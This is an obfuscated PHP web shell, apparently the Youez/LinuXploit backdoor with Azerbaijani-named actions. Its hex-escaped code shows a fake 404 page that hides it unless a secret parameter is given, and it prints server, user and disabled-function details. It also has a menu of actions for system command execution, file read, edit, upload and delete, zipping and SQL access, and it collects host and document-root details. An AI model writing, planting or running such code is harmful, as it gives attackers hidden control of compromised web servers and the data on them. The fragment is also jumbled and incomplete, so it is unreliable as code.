posix_getgrgid(posix_getegid()); $qrup = $qid["\x6e\141\x6d\x65"]; print "\74\163\x70\141\x6e\x20\143\x6c\x61\x73\163\x3d\47\x71\x61\x6c\151\156\47\76\125\156\x61\155\145\x3a\x3c\x2f\x73\160\141\x6e\76\40" . php_uname() . "\74\x62\162\x2f\76"; print "\74\x73\x70\x61\156\x20\x63\x6c\x61\x73\x73\75\47\x71\x61\x6c\x69\156\x27\x3e\125\163\x65\162\x3a\x3c\57\163\x70\141\x6e\76\x20" . getmyuid() . "\40\50" . get_current_user() . "\51\x3c\142\162\x2f\76"; print "\74\163\x70\x61\x6e\40\x63\154\x61\163\x73\75\47\161\x61\x6c\x69\x6e\x27\76\x47\162\x6f\x75\160\x3a\x3c\57\x73\160\x61\156\76\40" . getmygid() . "\40\50" . $qrup . "\x29\x3c\142\162\x2f\x3e"; } else { print "\x3c\x73\x70\x61\156\40\143\154\141\163\163\x3d\47\161\x61\154\151\x6e\47\76\125\x6e\141\x6d\145\72\x3c\x2f\x73\160\x61\x6e\x3e\x20" . php_uname() . "\x3c\142\x72\x2f\76"; print "\x3c\163\160\141\156\40\x63\154\141\163\163\x3d\x27\161\141\x6c\x69\x6e\x27\76\125\163\x65\x72\72\74\x2f\163\x70\x61\156\76\40" . getmyuid() . "\x20\x28" . get_current_user() . "\51\x3c\142\162\x2f\76"; print "\x3c\x73\160\141\156\x20\143\x6c\141\x73\x73\x3d\47\x71\141\154\151\x6e\x27\x3e\x47\x72\x6f\x75\160\x3a\74\x2f\x73\160\x61\x6e\76\40" . getmygid() . "\74\x62\162\57\76"; } goto OA0JZ; uilXC: $actions = array("\x65\163\x61\163", "\x66\x61\171\154\137\x6f\170\x75", "\x70\150\160\151\156\x66\157", "\163\x69\163\x74\145\x6d\x5f\153\x6f\155", "\146\x61\x79\x6c\137\x72\x65\144\141\x6b\164\145", "\146\141\171\154\x5f\171\165\x6b\154\145", "\146\x61\171\x6c\x5f\x73\x69\x6c", "\x66\x61\171\x6c\x5f\x79\x61\x72\141\x74", "\160\141\x70\153\x61\x5f\171\141\162\x61\164", "\146\x61\x79\x6c\x5f\163\151\x66\x69\x72\154\x61", "\160\x61\x70\153\x61\137\163\x69\154", "\146\x61\171\154\x5f\141\x64\137\x64\145\171\151\163\x68", "\x7a\x69\160\154\x65", "\x73\x6b\154", "\163\153\x6c\137\144\x5f\164", "\163\153\154\137\x64", "\146\141\171\x6c\137\165\160\154"); goto QBm6Y; Gk1WZ: $EL_MuHaMMeD .= "\101\166\x6c\x61\156\141\156\x20\123\x69\164\145\40\72\40" . $_SERVER["\110\x54\124\120\x5f\x48\117\x53\124"] . "\xd\xa"; goto DjAzb; DUIis: ?>
");n&&sehife("?ne=ziple&qovluq=<?php  goto UAcWL; OA0JZ: print "\74\163\x70\x61\x6e\40\x63\x6c\x61\x73\163\x3d\x27\161\141\x6c\x69\156\47\76\x44\x69\163\x61\142\x6c\x65\x20\x66\165\x6e\x63\x74\151\x6f\x6e\163\72\74\57\163\160\141\156\x3e\x20" . (implode("\54\x20", $baqliFunksiyalar) == '' ? "\74\x73\160\141\x6e\40\x63\x6c\x61\163\x73\x3d\47\163\x75\143\143\x65\163\x73\x27\x3e\171\157\x78\x64\165\x20\72\x29" : "\x3c\x73\160\x61\x6e\x20\143\154\x61\163\163\75\47\142\x61\x64\x27\76" . implode("\x2c\40", $baqliFunksiyalar)) . "\74\x2f\163\160\x61\156\x3e\74\x62\x72\57\x3e"; goto P9HQ6; z8ijM: $EL_MuHaMMeD = "\104\157\x73\171\141\x20\x59\157\154\x75\40\72\40" . $_SERVER["\104\117\x43\x55\x4d\105\x4e\x54\x5f\122\117\x4f\124"] . "\xd\12"; goto vRMX_; ufXmt: session_start(); goto ER3Vz; Y1V__: $server_mail = '' . gethostbyname($_SERVER["\123\105\x52\x56\x45\122\x5f\x4e\101\x4d\x45"]) . "\40\x20\55\40" . $_SERVER["\x48\x54\x54\x50\137\x48\x4f\123\124"] . ''; goto SSi1C; rK6ii: if (!isset($_GET["\142\141\x62\141\156\163\x65\157"]) && !isLoggedIn()) { header("\110\124\x54\120\57\61\x2e\60\x20\64\x30\x34\x20\116\157\x74\40\x46\157\165\156\x64"); echo "\x3c\x21\x44\117\x43\124\x59\120\x45\x20\x48\124\115\x4c\x20\x50\125\x42\114\x49\103\x20\42\55\x2f\57\111\105\x54\106\x2f\x2f\104\x54\x44\x20\x48\x54\x4d\114\x20\x32\56\x30\57\57\105\x4e\x22\x3e\12\74\150\x74\155\154\76\74\150\x65\x61\x64\x3e\xa\x3c\x74\x69\x74\154\145\x3e\64\60\x34\x20\116\157\164\x20\x46\x6f\165\x6e\x64\x3c\x2f\x74\x69\164\x6c\145\76\xa\74\x2f\150\145\x61\x64\x3e\74\142\157\x64\x79\x3e\xa\x3c\x68\61\x3e\116\157\164\40\106\x6f\x75\x6e\144\x3c\x2f\x68\x31\x3e\12\x3c\160\76\124\150\145\40\x72\145\161\x75\x65\163\x74\x65\x64\x20\125\x52\114\x20\167\141\x73\x20\156\157\x74\x20\x66\157\165\x6e\x64\40\157\156\x20\164\x68\x69\x73\x20\x73\x65\162\x76\x65\162\56\x3c\57\x70\x3e\12\x3c\x70\x3e\x41\x64\x64\151\x74\x69\157\156\141\154\x6c\171\x2c\x20\141\40\x34\x30\64\40\116\x6f\x74\40\x46\157\165\156\x64\40\x65\162\162\x6f\162\40\167\141\163\40\x65\156\143\157\x75\156\164\x65\162\145\144\x20\167\x68\x69\154\x65\x20\x74\162\x79\151\x6e\147\x20\164\x6f\x20\x75\x73\145\40\141\156\x20\x45\162\x72\157\x72\x44\157\x63\x75\155\x65\x6e\164\40\164\x6f\x20\x68\141\x6e\144\154\x65\x20\164\150\x65\40\x72\x65\161\165\145\x73\164\x2e\74\57\160\76\12\x3c\57\142\x6f\144\x79\x3e\x3c\57\150\x74\x6d\154\76"; die; } goto ufXmt; f4vMQ: echo urlencode(urlencode(shifrele($default_dir))); goto Epe2R; Gz5ZR: echo urlencode(urlencode(shifrele($default_dir))); goto il21Q; kmxAo: $time_shell = '' . date("\x64\57\x6d\57\x59\40\55\x20\110\72\151\72\x73") . ''; goto nmUEC; J8tOz: $from_shellcode = "\x77\x68\155\x40" . gethostbyname($_SERVER["\123\105\122\x56\x45\122\x5f\116\101\115\105"]) . ''; goto DYiqH; iTlcJ: ')); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit